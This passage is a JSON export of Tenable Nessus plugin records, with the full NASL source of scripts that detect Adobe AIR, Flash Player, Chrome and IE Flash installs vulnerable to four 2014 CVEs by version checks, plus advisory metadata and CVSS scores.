"2019-11-02T00:00:00", "id": "ADOBE_AIR_APSB14-22.NASL", "href": "https://www.tenable.com/plugins/nessus/78440", "published": "2014-10-15T00:00:00", "title": "Adobe AIR <= AIR 15.0.0.249 Multiple Vulnerabilities (APSB14-22)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78440);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Adobe AIR <= AIR 15.0.0.249 Multiple Vulnerabilities (APSB14-22)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 15.0.0.249. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 15.0.0.293 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '15.0.0.249';\nfix = '15.0.0.293';\nfix_ui = '15.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' + \n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T11:19:45", "bulletinFamily": "scanner", "description": "According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 15.0.0.249. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "MACOSX_ADOBE_AIR_15_0_0_293.NASL", "href": "https://www.tenable.com/plugins/nessus/78442", "published": "2014-10-15T00:00:00", "title": "Adobe AIR for Mac <= 15.0.0.249 Multiple Vulnerabilities (APSB14-21)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78442);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Adobe AIR for Mac <= 15.0.0.249 Multiple Vulnerabilities (APSB14-21)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 15.0.0.249. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 15.0.0.293 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '15.0.0.249';\nfixed_version_for_report = '15.0.0.293';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T11:21:56", "bulletinFamily": "scanner", "description": "According to its version, the installation of Adobe Flash Player\ninstalled on the remote Mac OS X host is equal or prior to 15.0.0.167.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "MACOSX_FLASH_PLAYER_15_0_0_189.NASL", "href": "https://www.tenable.com/plugins/nessus/78443", "published": "2014-10-15T00:00:00", "title": "Flash Player for Mac <= 15.0.0.167 Multiple Vulnerabilities (APSB14-22)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78443);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Flash Player for Mac <= 15.0.0.167 Multiple Vulnerabilities (APSB14-22)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe Flash Player\ninstalled on the remote Mac OS X host is equal or prior to 15.0.0.167.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 15.0.0.189 or later.\n\nAlternatively, Adobe has made version 13.0.0.250 available for those\ninstallations that cannot be upgraded to 15.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"15.0.0.167\";\n fix = \"15.0.0.189\";\n}\nelse\n{\n cutoff_version = \"13.0.0.244\";\n fix = \"13.0.0.250\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T11:22:06", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 38.0.2125.104. It is, therefore, affected by the\nfollowing vulnerabilities due to the version of Adobe Flash bundled\nwith the application :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "MACOSX_GOOGLE_CHROME_38_0_2125_104.NASL", "href": "https://www.tenable.com/plugins/nessus/78476", "published": "2014-10-15T00:00:00", "title": "Google Chrome < 38.0.2125.104 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78476);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Google Chrome < 38.0.2125.104 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 38.0.2125.104. It is, therefore, affected by the\nfollowing vulnerabilities due to the version of Adobe Flash bundled\nwith the application :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n # http://googlechromereleases.blogspot.dk/2014/10/stable-channel-update_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?335e9fff\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 38.0.2125.104 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'38.0.2125.104', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T11:04:20", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote host is a version\nprior to 38.0.2125.104. It is, therefore, affected by the following\nvulnerabilities due to the version of Adobe Flash bundled with the\napplication :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "GOOGLE_CHROME_38_0_2125_104.NASL", "href": "https://www.tenable.com/plugins/nessus/78475", "published": "2014-10-15T00:00:00", "title": "Google Chrome < 38.0.2125.104 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78475);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Google Chrome < 38.0.2125.104 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote host is a version\nprior to 38.0.2125.104. It is, therefore, affected by the following\nvulnerabilities due to the version of Adobe Flash bundled with the\napplication :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n # http://googlechromereleases.blogspot.dk/2014/10/stable-channel-update_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?335e9fff\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 38.0.2125.104 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'38.0.2125.104', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T12:31:00", "bulletinFamily": "scanner", "description": "The remote host is missing KB3001237. It is, therefore, affected by\nthe following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "SMB_KB3001237.NASL", "href": "https://www.tenable.com/plugins/nessus/78444", "published": "2014-10-15T00:00:00", "title": "MS KB3001237: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78444);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n script_xref(name:\"MSKB\", value:\"3001237\");\n\n script_name(english:\"MS KB3001237: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB3001237. It is, therefore, affected by\nthe following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3001237/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3001237.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 15.0.0.167\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 15 ||\n (\n iver[0] == 15 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 167)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 15.0.0.167' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T10:51:51", "bulletinFamily": "scanner", "description": "According to its version, the installation of Adobe Flash Player\ninstalled on the remote Windows host is equal or prior to 15.0.0.167.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "FLASH_PLAYER_APSB14-22.NASL", "href": "https://www.tenable.com/plugins/nessus/78441", "published": "2014-10-15T00:00:00", "title": "Flash Player <= 15.0.0.167 Multiple Vulnerabilities (APSB14-22)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78441);\n 